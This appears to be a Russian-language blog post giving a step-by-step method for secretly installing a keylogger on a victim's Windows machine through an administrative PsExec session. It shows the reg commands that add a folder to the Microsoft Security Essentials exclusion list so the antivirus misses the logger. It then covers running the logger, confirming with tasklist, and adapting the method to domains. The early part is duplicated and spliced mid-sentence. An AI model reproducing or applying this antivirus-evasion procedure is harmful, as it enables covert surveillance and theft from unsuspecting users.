Дано: Сессия PsExec (либо любая другая) с административными привилегиями на машине жертвы. У жертвы установлен Microsoft Security Essentials либо System Center Endpoint Protection.
Задача: Незаметно для жертвы установить кейлоггер.
Разберём неправильный и правильный способ решения данной задачи.
Для начала проверим, что произойдёт, если попробовать установить логгер "в лоб" без всяких ухищрений. Собираем бинарник, задаём в качестве рабочей директории что-нибудь неприметное, например c:\Windows\SysWOW64\WindowsPowerShell\
1. Открываем сессию PsExec
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPUlSTtAVm1qNIa2esyhmKy3cF6f_Fp-CjGHg-En6h92Kk9cVf1AyhbXScU4bi1rsl-KpBkIdxjFPM6ObWAeUdFYJBi2lanQ8f5RDqoJrx4QGzx0DgjDe6r0hM_Q04Qv4WywtJeKvf_BS4/s1600/1.1.jpg)
2. Кидаем установщик логгера в директорию c:\Windows\SysWOW64\WindowsPowerShell\ и запускаемЗадача: Незаметно для жертвы установить кейлоггер.
Разберём неправильный и правильный способ решения данной задачи.
Неправильный способ
1. Открываем сессию PsExec
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPUlSTtAVm1qNIa2esyhmKy3cF6f_Fp-CjGHg-En6h92Kk9cVf1AyhbXScU4bi1rsl-KpBkIdxjFPM6ObWAeUdFYJBi2lanQ8f5RDqoJrx4QGzx0DgjDe6r0hM_Q04Qv4WywtJeKvf_BS4/s1600/1.1.jpg)
c:\Windows\SysWOW64\WindowsPowerShell\trojan.exe
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi54InCYyIBfVv57VT0VjhaWx53ZOs4qeL8s9ETgTYp7Uw8cwfcvn-F4MZsuYFWZyKCR2Bb6a9j5hLmhycAKdadEJ-Ewtg4_T4IJN_MyD3twsmrLiW7Nj1hE3p6on0ta1y1ATT9z_L_aKB5/s1600/8.1.jpg)
Ищем процесс кейлоггера
tasklist /fi "IMAGENAME eq VME.exe"
Его нет. А почему? Да потому что, антивирус успешно отработал и радостно сообщил об этом жертве.
Операция провалена...
Правильный способ
Список исключений для Microsoft Security Essentials хранится в ключе реестра HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
1. Для начала проверим его содержимое
reg query "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths"
В данном случае список исключений пуст.
2. Добавим в исключения директорию c:\Windows\SysWOW64\WindowsPowerShell\
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths" /v c:\Windows\SysWOW64\WindowsPowerShell\ /d "1" /t REG_DWORD
и проверим результат
reg query "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths"
3. Помещаем логгер в выбранный нами каталог и запускаем его
c:\Windows\SysWOW64\WindowsPowerShell\trojan.exe
Проверяем результат:
tasklist /fi "IMAGENAME eq VME.exe"
PROFIT! Логгер запущен, а антивирус жертвы ни о чём не подозревает
Поправка на домен
- Если список исключений задан (в реестре есть какие-либо записи) устанавливаем логгер в любой из перечисленных там каталогов;
- Если список исключений не задан (записи в реестре отсутствуют) то политика исключений не настроена и мы можем смело вписывать туда нужный нам каталог.
В остальном порядок действий ничем не отличается.